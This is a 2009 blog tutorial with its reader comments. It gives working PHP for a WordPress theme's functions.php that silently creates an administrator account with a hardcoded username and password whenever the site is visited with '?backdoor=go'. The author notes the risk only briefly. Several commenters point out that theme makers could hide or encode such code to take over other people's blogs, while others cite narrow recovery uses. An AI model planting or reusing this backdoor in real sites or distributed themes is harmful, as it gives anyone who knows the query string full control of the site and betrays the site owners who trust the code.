How To: Create Backdoor Admin Access in WordPress

29 Dec, 2009  How To, PHP, WordPress

Have you ever wanted to create an easy backdoor way to auto-create an administrator account in WordPress? The below code snippet does just that! Simply place the code in your themes functions.php flie and upload to your web server:

<?php
add_action('wp_head', 'my_backdoor');

function my_backdoor() {
	If ($_GET['backdoor'] == 'go') {
		require('wp-includes/registration.php');
		If (!username_exists('brad')) {
			$user_id = wp_create_user('brad', 'pa55w0rd');
			$user = new WP_User($user_id);
			$user->set_role('administrator');
		}
	}
}
?>

To activate this code simply visit http://example.com?backdoor=go

When triggered the code will create a new administrator account with a username brad and password of pa55w0rd. The function also verifies the user account doesn’t exist first before creating it.

Keep in mind using this code is considered a security risk as anyone could easily execute this function by calling the correct querystring. Also don’t be evil, only use this code for good!

Popularity: 7% [?]

Related posts:

  1. How To: Load User Info Using the Admin Email in WordPress
  2. How To: Create ASP and AJAX username availability check example
  3. How To: Add a Post Thumbnail to an RSS Feed in WordPress
  4. How To: Move a WordPress Blog to a New Hosting Account
  5. How To: Create Your First Wikipedia Article

Tags: , , ,

14 Comments so far »

  1. Tweets that mention How To: Create Backdoor Admin Access in WordPress | Brad Williams Blog: Life of an Internet Startup -- Topsy.com said

    am December 29 2009 @ 2:52 pm

    [...] This post was mentioned on Twitter by Brad Williams, Darren Champen. Darren Champen said: RT @williamsba: New blog post: How To: Create Backdoor Admin Access in WordPress http://bit.ly/4UyhvM [...]

  2. DanielNo Gravatar said

    am December 29 2009 @ 3:34 pm

    What you’re presenting here is way not fair.

  3. BradNo Gravatar said

    am December 29 2009 @ 3:50 pm

    Not fair in what way Daniel?

  4. DanielNo Gravatar said

    am December 29 2009 @ 4:57 pm

    Obviously, because someone may use it to hack into other people’s blogs.

  5. BradNo Gravatar said

    am December 29 2009 @ 5:10 pm

    To set this code up you would need FTP access to a site. So technically you can’t really hack a site with this code, but I see where you are coming from. That’s why I said don’t be evil

  6. Viper007BondNo Gravatar said

    am December 29 2009 @ 6:47 pm

    @Daniel: If someone has enough access to a blog to be able to implement this code, then this should be the least of your worries.

  7. LelandNo Gravatar said

    am December 29 2009 @ 7:09 pm

    Brad (or anyone), can you give a practical example of how setting up a backdoor like this could be used legitimately? To be honest, I can’t think of anything good coming out of it.

  8. KeithNo Gravatar said

    am December 29 2009 @ 7:20 pm

    It’s interesting.

    I’m not a WP expert, but if a WordPress theme creator (Such as leland) inserted this code into a themes function.php file… couldn’t he gain access to any blog using the user/pass defined in that code?

    Just wondering, as I said, I’m not WP expert.

  9. Tommy VallierNo Gravatar said

    am December 29 2009 @ 8:05 pm

    Keith,

    Yeah – they could.

    I’m using similar code via a plugin for clients. The plugin sits in the admin sidebar and acts, mostly, as a contact form. It sits there in case a client needs help with something. When they do, they click on the link in the sidebar and fill in the form to “call” us.

    If there isn’t already a dedicated user for us, a button is also on that page with a reminder that it’s best to have us work under our own username, and that they can click the button to generate one for us.

  10. DanielNo Gravatar said

    am December 29 2009 @ 11:30 pm

    but I see where you are coming from. That’s why I said don’t be evil

    Prejudices, Brad? :)

    As stated above, it may be very easy for theme creators to insert such code into themes. It can also be encoded and inserted somewhere randomly as just a line of text. Most users are illiterates so chances are they won’t even suspect it.

  11. Viper007BondNo Gravatar said

    am December 30 2009 @ 6:52 am

    @Leland: You have FTP access to a client’s blog but are unable to access their administration area (forgotten password and unknown e-mail address) or MySQL. The times you’d need this are rather slim though.

    Regardless, it’s not like Brad just invented something new here. This is one of the least detrimental things one could do to your blog if they wanted to. A theme is like a plugin — I could use a theme to spam other blogs, give me access to the files on your server, etc. etc. etc.

  12. LelandNo Gravatar said

    am December 30 2009 @ 6:56 am

    @Viper007Bond: Yeah, true. Thanks for the response. I guess it can come in handy for when you just have FTP access and no other way to login.

    Also thanks Tommy for the response, that sounds like an interesting application as well.

  13. BradNo Gravatar said

    am December 30 2009 @ 8:35 am

    Nice to see this code snippet got some conversations going! There are definitely many different uses for this code, some good and some bad. Any theme or plugin could contain malicious code, so it’s always a good idea to review the code of any theme or plugin you plan on using if it’s not from a trusted source.

  14. Backdoor in Wordpress ganz easy | wordpress | XSBlog2.0beta said

    am January 6 2010 @ 6:19 am

    [...] Benutzer in Wordpress anlegt und diesem Administrator-Rechte zuweist, zeigt der Beitrag “How-To: Create Backdoor Admin Access in Wordpress“. Der Code sitzt in der functions.php des Templates und wird durch einen speziellen Aufruf [...]

Comment RSS · TrackBack URI

Leave a comment

Name: (Required)

eMail: (Required)

Website:

Comment: